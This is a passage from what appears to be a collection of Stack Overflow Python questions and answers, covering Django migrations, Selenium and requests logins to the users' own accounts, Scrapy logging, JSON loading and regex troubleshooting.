def sub(self, x, y):
answer = x - y
print(answer)
Test script:
import calc
c = calc.calc()
c.add(5, 3)
Several modules in the standard library exhibit this naming scheme of a module
containing an attribute with the same name, such as `datetime.datetime`,
`time.time`, and `pprint.pprint`.
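Alternatively, you can import the class itself so you can drop the module prefix:

    from calc import calc

    c = calc()
    c.add(5, 3)  # prints 8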
|
Locating a graphic function (Python)
Question: First off, thanks to the site and everybody on it. I am taking my first python
class and have come across this site many times when trouble-shooting coding
problems. Thanks to everybody who has already helped me out a little thus
far. But, I do have a problem I can't figure out:
I have to draw the "5" side of a die in a python graphics window. The catch is
that I can't just draw them. My "Dot" function has to be called 5 times to
complete the graphic. I had trouble with the dot being placed on the
rectangle, but the prof helped me out there. I just can't seem to locate the
same dot in different locations. Here is my code so far:
from graphics import*
def Dot(win):
# Draw a dot
center=Point(150,150)
circ=Circle(center,25)
circ.setFill('Black')
circ.draw(win)
def Dice():
#Build the dice (fill white, background green)
win=GraphWin('Shapes',500,500)
win.setBackground('Green')
rect=Rectangle(Point(100,100),Point(400,400))
rect.setFill('White')
rect.draw(win)
#Call dot 5 times with different locations:
Dot(win)
Dot(win)
Dot(win)
Dot(win)
Dot(win)
def main():
Dice()
main()
I have to call the "Dot" function 5 times. I have tried `.move(pt, pt)`,
`.locate`, etc., but I can't figure out how to make the "Dot" function draw at
a different location in the graphics window each time. Any help would be
greatly appreciated.
Thanks.
Answer: I was finally able to get this one. I wasn't aware you could pass more
arguments after the window argument. So `Dot(win, 350, 150)` etc., with the
different coordinates, worked well. Thanks for the responses and help!
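For completeness, a sketch of the parameterized `Dot` this answer alludes to (it assumes Zelle's graphics module from the question, and the pip coordinates are an assumption based on the 300x300 white square):

    def Dot(win, x, y):
        # Draw a dot centered at (x, y)
        circ = Circle(Point(x, y), 25)
        circ.setFill('Black')
        circ.draw(win)

    # The five pips of the "5" face
    Dot(win, 150, 150)
    Dot(win, 350, 150)
    Dot(win, 250, 250)
    Dot(win, 150, 350)
    Dot(win, 350, 350)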
|
Custom User Model ValueError: Related Model Django(1.9)
Question: There is an error when I try to add my custom user model as a
ForeignKey to a field in Django. Authentication works using the custom user
model, but for some reason I keep getting this error:
ValueError: Related model 'authentication.UserModel' cannot be resolved
Here is the app/models.py:
from django.db import models
from django.conf import settings
class A(models.Model):
tender_authority = models.ForeignKey(settings.AUTH_USER_MODEL)
Here is the settings.py
AUTH_USER_MODEL = 'authentication.UserModel'
Here is the tree structure of the project:
myproject
settings.py
authentication
models.py ---> UserModel (my custom user model name) Model is present here
myapp
models.py ---> Error happening here
Thank you in advance.
Full traceback (I forgot to mention that this is happening while I am trying
to migrate):
Operations to perform:
Apply all migrations: auth, admin, authentication, contenttypes, sessions, Forms
Running migrations:
Rendering model states... DONE
Applying Forms.0010_tech_auth_Usermodel_to_User...Traceback (most recent call last):
File "manage.py", line 10, in <module>
execute_from_command_line(sys.argv)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/__init__.py", line 353, in execute_from_command_line
utility.execute()
File "/usr/local/lib/python3.5/dist-packages/django/core/management/__init__.py", line 345, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/base.py", line 348, in run_from_argv
self.execute(*args, **cmd_options)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/base.py", line 399, in execute
output = self.handle(*args, **options)
File "/usr/local/lib/python3.5/dist-packages/django/core/management/commands/migrate.py", line 200, in handle
executor.migrate(targets, plan, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 92, in migrate
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 121, in _migrate_all_forwards
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/executor.py", line 198, in apply_migration
state = migration.apply(state, schema_editor)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/migration.py", line 123, in apply
operation.database_forwards(self.app_label, schema_editor, old_state, project_state)
File "/usr/local/lib/python3.5/dist-packages/django/db/migrations/operations/fields.py", line 201, in database_forwards
schema_editor.alter_field(from_model, from_field, to_field)
File "/usr/local/lib/python3.5/dist-packages/django/db/backends/base/schema.py", line 454, in alter_field
new_db_params = new_field.db_parameters(connection=self.connection)
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 967, in db_parameters
return {"type": self.db_type(connection), "check": []}
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 958, in db_type
rel_field = self.target_field
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 861, in target_field
return self.foreign_related_fields[0]
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 594, in foreign_related_fields
return tuple(rhs_field for lhs_field, rhs_field in self.related_fields if rhs_field)
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 581, in related_fields
self._related_fields = self.resolve_related_fields()
File "/usr/local/lib/python3.5/dist-packages/django/db/models/fields/related.py", line 566, in resolve_related_fields
raise ValueError('Related model %r cannot be resolved' % self.remote_field.model)
ValueError: Related model 'authentication.UserModel' cannot be resolved
Migration:
class Migration(migrations.Migration):
dependencies = [
('Forms', '0009_revised_tender_changes'),
]
operations = [
migrations.AlterField(
model_name='agreementsanctionmodel',
name='bank_details_one',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.BankDetailsModel', verbose_name='Bank Details'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='contractor',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.Contractor', verbose_name='Contractor'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='contractor_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Contractor'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='tender',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.Tender', verbose_name='Tender'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='tender_name',
field=models.CharField(blank=True, max_length=50, unique=True, verbose_name='Tender'),
),
migrations.AlterField(
model_name='agreementsanctionmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='consultant',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='consultant',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='consultant',
name='first_name',
field=models.CharField(default=0, max_length=100, verbose_name='First Name'),
preserve_default=False,
),
migrations.AlterField(
model_name='consultant',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='consultant',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='consultant',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='consultant',
name='pan_number',
field=models.CharField(default=0, max_length=50, unique=True, verbose_name='PAN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='consultant',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='consultant',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='consultant',
name='tin_number',
field=models.CharField(default=0, max_length=10, unique=True, verbose_name='TIN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='contractor',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='contractor',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='contractor',
name='first_name',
field=models.CharField(max_length=100, verbose_name='First Name'),
),
migrations.AlterField(
model_name='contractor',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='contractor',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='contractor',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='contractor',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='contractor',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='locationmodel',
name='district',
field=models.CharField(max_length=50, verbose_name='District '),
),
migrations.AlterField(
model_name='locationmodel',
name='division',
field=models.CharField(max_length=50, verbose_name='Division '),
),
migrations.AlterField(
model_name='locationmodel',
name='location',
field=models.CharField(max_length=50, verbose_name='Location'),
),
migrations.AlterField(
model_name='locationmodel',
name='place',
field=models.CharField(max_length=50, verbose_name='Place '),
),
migrations.AlterField(
model_name='locationmodel',
name='work',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
migrations.AlterField(
model_name='nominationmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='nominationmodel',
name='tender_authority',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='nominationmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='nominationmodel',
name='work_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
migrations.AlterField(
model_name='pettycontractors',
name='districts',
field=models.CharField(max_length=50, null=True, verbose_name='District'),
),
migrations.AlterField(
model_name='pettycontractors',
name='email',
field=models.EmailField(blank=True, max_length=254, null=True, unique=True, verbose_name='Email ID'),
),
migrations.AlterField(
model_name='pettycontractors',
name='first_name',
field=models.CharField(default=0, max_length=100, verbose_name='First Name'),
preserve_default=False,
),
migrations.AlterField(
model_name='pettycontractors',
name='house_number',
field=models.CharField(blank=True, max_length=50, null=True, verbose_name='Phone Number'),
),
migrations.AlterField(
model_name='pettycontractors',
name='last_name',
field=models.CharField(max_length=100, verbose_name='Last Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='middle_name',
field=models.CharField(blank=True, max_length=100, null=True, verbose_name='Middle Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='pan_number',
field=models.CharField(default=0, max_length=50, unique=True, verbose_name='PAN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='pettycontractors',
name='state',
field=models.CharField(max_length=50, null=True, verbose_name='State'),
),
migrations.AlterField(
model_name='pettycontractors',
name='street_name',
field=models.CharField(max_length=50, null=True, verbose_name='Street Name'),
),
migrations.AlterField(
model_name='pettycontractors',
name='tin_number',
field=models.CharField(default=0, max_length=10, unique=True, verbose_name='TIN Number'),
preserve_default=False,
),
migrations.AlterField(
model_name='projectmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='projectmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='projectmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, unique=True, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='projectmodel',
name='scheme_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Scheme Name'),
),
migrations.AlterField(
model_name='projectmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Update On'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='project',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.ProjectModel', verbose_name='Project'),
),
migrations.AlterField(
model_name='revisedadministrativesanctionmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='authority',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='updated_on',
field=models.DateField(blank=True, default=None, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='revisedtechnicalapprovalmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Work'),
),
migrations.AlterField(
model_name='revisedtechnicalsanctionmodel',
name='project',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.ProjectModel', verbose_name='Project'),
),
migrations.AlterField(
model_name='schememodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='schememodel',
name='dept_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.UserDepartment', verbose_name='Department Name'),
),
migrations.AlterField(
model_name='schememodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='schememodel',
name='scheme_name',
field=models.CharField(max_length=250, unique=True, verbose_name='Scheme Name'),
),
migrations.AlterField(
model_name='schememodel',
name='total_admin_sanction_amount',
field=models.FloatField(verbose_name='Total Admin Sanction Amount'),
),
migrations.AlterField(
model_name='schememodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='updated_on',
field=models.DateField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='technicalapprovalmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Work Name'),
),
migrations.AlterField(
model_name='technicalauthority',
name='tender_authority',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Technical Authority'),
preserve_default=False,
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='project_name',
field=models.CharField(blank=True, max_length=300, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='technical_authority',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='technicalsanctionmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Update On'),
),
migrations.AlterField(
model_name='technicalwing',
name='technical_wing_name',
field=models.CharField(max_length=10, null=True, unique=True, verbose_name='Technical Wing'),
),
migrations.AlterField(
model_name='tender',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='tender',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='userdepartment',
name='department_name',
field=models.CharField(max_length=50, null=True, unique=True, verbose_name='Department Name'),
),
migrations.AlterField(
model_name='userdepartment',
name='department_reference',
field=models.CharField(max_length=7, null=True, unique=True, verbose_name='Department Name'),
),
migrations.AlterField(
model_name='workmodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='workmodel',
name='financial_year',
field=models.CharField(blank=True, max_length=5, verbose_name='Financial Year'),
),
migrations.AlterField(
model_name='workmodel',
name='project_name',
field=models.CharField(blank=True, max_length=250, verbose_name='Project Name'),
),
migrations.AlterField(
model_name='workmodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='workmodel',
name='work_name',
field=models.CharField(blank=True, max_length=300, unique=True, verbose_name='Work Name'),
),
migrations.AlterField(
model_name='workordermodel',
name='created_on',
field=models.DateTimeField(auto_now=True, verbose_name='Created On'),
),
migrations.AlterField(
model_name='workordermodel',
name='tender_authority',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.TechnicalAuthority', verbose_name='Technical Authority'),
),
migrations.AlterField(
model_name='workordermodel',
name='updated_on',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated On'),
),
migrations.AlterField(
model_name='workordermodel',
name='work_name',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='Forms.WorkModel', verbose_name='Work'),
),
]
Answer: You seem to be missing a dependency for the migration that adds the user
model. I'm not sure why it's missing, but try adding it manually and running
your migrations again:
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Forms', '0009_revised_tender_changes'),
]
|
Selenium - Login raises ElementNotVisibleException
Question: I am using Selenium Webdriver to login to a site. I've tried multiple
different selectors, and have tried implicit waits, but cannot locate the
element.
from selenium import webdriver
from selenium.webdriver.common.by import By
browser = webdriver.Firefox()
url = "https://www.example.com"
login_page = browser.get(url)
username = browser.find_element_by_id("Email")
# Also tried:
# username = browser.find_element_by_xpath('//*[@id="Email"]')
# username = browser.find_element_by_css_selector('#Email')
username.send_keys("email")
This is the HTML:
<div class="form-group">
<label for="Email">Email address</label>
<div class="input-group" style="width: 100%">
<input class="form-control email" data-val="true" data-val-length="Maximum length is 50" data-val-length-max="50" data-val-regex="Provided email address is not valid" data-val-regex-pattern="^([a-zA-Z0-9_\-\.]+)@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.)|(([a-zA-Z0-9\-]+\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$" data-val-required="Email is required" id="Email" name="Email" type="email" value=""><br>
<span class="field-validation-valid" data-valmsg-for="Email" data-valmsg-replace="true"></span>
</div>
</div>
Here is the error message
Traceback (most recent call last):
File "seleniumloginpi.py", line 12, in <module>
email.send_keys('email')
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webelement.py", line 320, in send_keys
self._execute(Command.SEND_KEYS_TO_ELEMENT, {'value': keys_to_typing(value)})
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webelement.py", line 461, in _execute
return self._parent.execute(command, params)
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/webdriver.py", line 236, in execute
self.error_handler.check_response(response)
File "/Users/greg/anaconda/envs/trade/lib/python2.7/site-packages/selenium/webdriver/remote/errorhandler.py", line 192, in check_response
raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.ElementNotVisibleException: Message: Element is not currently visible and so may not be interacted with
Stacktrace:
at fxdriver.preconditions.visible (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:10092)
at DelayedCommand.prototype.checkPreconditions_ (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12644)
at DelayedCommand.prototype.executeInternal_/h (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12661)
at DelayedCommand.prototype.executeInternal_ (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12666)
at DelayedCommand.prototype.execute/< (file:///var/folders/2h/3nnr94wx0f9g9bjcl0ks_g1w0000gn/T/tmpfAR5E7/extensions/fxdriver@googlecode.com/components/command-processor.js:12608)
Any help would be greatly appreciated.
Answer: Actually you are locating the element; the problem is with
`send_keys`: the value could not be set on the email input because the element
is not visible. But as far as I can see, no style attribute exists on the
email input in the provided HTML that would make it invisible.
Possibly there are more elements with the same id and you are interacting with
a different one, so you should try a more specific locator, as below:
username = browser.find_element_by_css_selector('div.input-group input#Email.form-control.email')
username.send_keys("email")
Or try to find all elements with the Id `Email` and perform `send_keys()` on
visible element as below :
usernames = browser.find_elements_by_id('Email')
for username in usernames:
if username.is_displayed():
username.send_keys("email")
break
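If the field only becomes visible after some client-side rendering, an explicit wait is usually more robust than sleeping (a sketch, assuming the input does eventually become visible):

    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC
    from selenium.webdriver.common.by import By

    username = WebDriverWait(browser, 10).until(
        EC.visibility_of_element_located((By.ID, "Email"))
    )
    username.send_keys("email")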
|
Use requests module in Python to log in to Barclays premier league fantasy football?
Question: I'm trying to write a Python script to let me log in to my fantasy football
account at <https://fantasy.premierleague.com/>, but something is not quite
right with my log in. When I login through my browser and check the details
using Chrome developer tools, I find that the Request URL is
<https://users.premierleague.com/accounts/login/> and the form data sent is:
csrfmiddlewaretoken:[My token]
login:[My username]
password:[My password]
app:plfpl-web
redirect_uri:https://fantasy.premierleague.com/a/login
There are also a number of Request headers:
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding:gzip, deflate, br
Accept-Language:en-US,en;q=0.8
Cache-Control:max-age=0
Connection:keep-alive
Content-Length:185
Content-Type:application/x-www-form-urlencoded
Cookie:[My cookies]
Host:users.premierleague.com
Origin:https://fantasy.premierleague.com
Referer:https://fantasy.premierleague.com/
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
So I've written a short Python script using the requests library to try to log
in and navigate to a page as follows:
import requests
with requests.Session() as session:
url_home = 'https://fantasy.premierleague.com/'
html_home = session.get(url_home)
csrftoken = session.cookies['csrftoken']
values = {
'csrfmiddlewaretoken': csrftoken,
'login': <My username>,
'password': <My password>,
'app': 'plfpl-web',
'redirect_uri': 'https://fantasy.premierleague.com/a/login'
}
head = {
'Host':'users.premierleague.com',
'Referer': 'https://fantasy.premierleague.com/',
}
session.post('https://users.premierleague.com/accounts/login/',
data = values, headers = head)
url_transfers = 'https://fantasy.premierleague.com/a/squad/transfers'
html_transfers = session.get(url_transfers)
print(html_transfers.content)
On printing out the content of my post request, I get an HTTP 500 error
with:
b'\n<html>\n<head>\n<title>Fastly error: unknown domain users.premierleague.com</title>\n</head>\n<body>\nFastly error: unknown domain: users.premierleague.com. Please check that this domain has been added to a service.</body></html>'
If I remove the 'host' entry from my head dict, I get an HTTP 405 error
with:
b''
I've tried including various combinations of the Request headers in my head
dict and nothing seems to work.
Answer: The following worked for me. I simply removed `headers = head`:
session.post('https://users.premierleague.com/accounts/login/',
data = values)
Most likely the hand-set Host header confuses the Fastly CDN in front of the
site; that is what the "Fastly error: unknown domain" message suggests. I
think you are trying to pick your team programmatically, like me. Your code
got me started, thanks.
|
How to specify log file name with spider's name in scrapy?
Question: I'm using scrapy. In my scrapy project, I created several spider
classes, and as the official document says, I used this way to specify the log
file name:
def logging_to_file(file_name):
"""
@rtype: logging
@type file_name:str
@param file_name:
@return:
"""
import logging
from scrapy.utils.log import configure_logging
configure_logging(install_root_handler=False)
logging.basicConfig(
        filename=file_name+'.txt',
filemode='a',
format='%(levelname)s: %(message)s',
level=logging.DEBUG,
)
class Spider_One(scrapy.Spider):
name='xxx1'
logging_to_file(name)
......
class Spider_Two(scrapy.Spider):
name='xxx2'
logging_to_file(name)
......
Now, if I start `Spider_One`, everything is correct! But if I start
`Spider_Two`, the log file of `Spider_Two` will also be named with the name of
`Spider_One`!
I have searched many answers from Google and Stack Overflow, but unfortunately
none worked!
I am using Python 2.7 & Scrapy 1.1!
Hope anyone can help me!
Answer: It's because you invoke `logging_to_file` at class-definition time,
i.e. every time your package is loaded. You are using a class variable here
where you should use an instance variable.
When Python loads your package or module, it executes every class body and so
on.
class MyClass:
# everything you do here is loaded everytime when package is loaded
name = 'something'
def __init__(self):
# everything you do here is loaded ONLY when the object is created
# using this class
To resolve your issue, just move the `logging_to_file` call into your spider's
`__init__()` method.
class MyClass(Spider):
name = 'xx1'
def __init__(self):
super(MyClass, self).__init__()
logging_to_file(self.name)
|
Python: Installing gooey using pip error
Question: I am trying to install Gooey for python and I keep on getting this error in
cmd ... I installed the latest version of pip and am running on the latest
version of python:
C:\Users\markj>pip install Gooey
Collecting Gooey
Using cached Gooey-0.9.2.3.zip
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\setup.py", line 9, in <module>
version = __import__('gooey').__version__
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\gooey\__init__.py", line 2, in <module>
from gooey.python_bindings.gooey_decorator import Gooey
File "C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\gooey\python_bindings\gooey_decorator.py", line 54
except Exception, e:
^
SyntaxError: invalid syntax
----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in C:\Users\markj\AppData\Local\Temp\pip-build-ti2h9xu3\Gooey\
Can someone please help me? Thank you!
Answer: The `except Exception, e:` syntax in the traceback is Python 2 only,
so this release of Gooey does not support Python 3; you could install it under
Python 2 instead. You could also try downloading the .zip file from the
official website here <http://chriskiehl.github.io/Gooey/> and installing it
manually to see if that will work.
|
How to parse a 'JSON string' file in Python?
Question: I am working on something that is quite similar to [this
topic](http://stackoverflow.com/questions/13938183/python-json-string-to-list-of-dictionaries-getting-error-when-iterating).
I downloaded a file which seems to be a JSON file. But when I open it in
Notepad, I find that it is a very long list of dictionaries. The file
essentially looks like this:
[
{'time':1, 'value':100},
{'time':2, 'value':105},
{'time':3, 'value':120}
]
I tried to load this 'JSON file' into Python like this:
import json
with open('data.json') as data_file:
data = json.loads(data_file)
but got an error:
TypeError: expected string or buffer
How can I load this file correctly into Python? I would like to iterate thru
each row to extract all the 'values'. Thanks!
Answer: Use `json.load`:
with open('data.json') as data_file:
data = json.load(data_file)
The primary difference between `json.load` and `json.loads` is that
`json.load` accepts a file (or file-like object) to read and load JSON from,
whereas `json.loads` loads JSON from a string.
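Once loaded, extracting all the values is a one-liner, for example (assuming the structure shown in the question; note that real JSON requires double-quoted keys, so if the file literally uses single quotes as shown, it is not valid JSON and `ast.literal_eval` can parse it instead):

    import json

    with open('data.json') as data_file:
        data = json.load(data_file)

    values = [entry['value'] for entry in data]
    print(values)  # [100, 105, 120]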
|
Python re.search anomaly
Question: I have a routine that searches through a directory of files and extracts a
customer number from the filename:
import os
import re
suffix= '.csv'
# For each file in input folder, extract customer number
input_list = os.listdir(path_in)
for input_file in input_list:
fileInput = os.path.join(path_in,input_file)
customer_ID = re.search('custID_(.+?)'+suffix,fileInput).group(1)
print(customer_ID)
With `suffix='.csv'` and a folder full of csv files:
> avg_hrly_custID_8147611.csv, avg_hrly_custID_8147612.csv,
> avg_hrly_custID_8147613.csv ...
I get the expected output:
> 8147611, 8147612, 8147613...
BUT, with `suffix = '.png'` and a folder of .png image files,:
> yearly_average_plot_custID_8147611.png,
> yearly_average_plot_custID_8147612.png,
> yearly_average_plot_custID_8147613.png ...
I get this error:
> AttributeError: 'NoneType' object has no attribute 'group'
Why won't it work for image files?
Answer: @BrenBarn spotted the cause of the problem. The regex failed because
there was a subdirectory in the directory whose name didn't match. I've solved
it by introducing `try....except`:
import os
import re
suffix= '.png'
# For each file in input folder, extract customer number
input_list = os.listdir(path_in)
for input_file in input_list:
fileInput = os.path.join(path_in,input_file)
try:
customer_ID = re.search('custID_(.+?)'+suffix,fileInput).group(1)
print(customer_ID)
        except AttributeError:  # re.search returned None (no match)
            pass
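An equivalent without the `try`/`except`, checking the match object before calling `group` (a minimal variation on the loop above):

    for input_file in input_list:
        fileInput = os.path.join(path_in, input_file)
        match = re.search('custID_(.+?)' + suffix, fileInput)
        if match:  # skip entries (e.g. subdirectories) whose names don't match
            print(match.group(1))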
|
How to remove part of the string after specific word in Python
Question: I get API-responses as a string which can be in two different formats:
1) `This is a message. <br><br>This message was created by Jimmy.`
2)
This is a message.
Text can be in the new row.
This message was created by Jimmy.
I want to remove text "This message was created by ['name']" from every
message. Expected result:
> This is a message.
This is what I have tried:
`modified_message = re.search('(.+?)<br><br>', message).group(1)`
It works with example 1), but of course it doesn't with 2).
How could I filter the text out of example 2), given that it is a multiline
string? Could it be done with one expression?
Answer: Please check this; I added code to handle multiline strings.
import re
data1 = "This is a message. <br><br>This message was created by Jimmy."
data2 = """
This is a message.
This message was created by Jimmy.
"""
print "First case..."
print data1
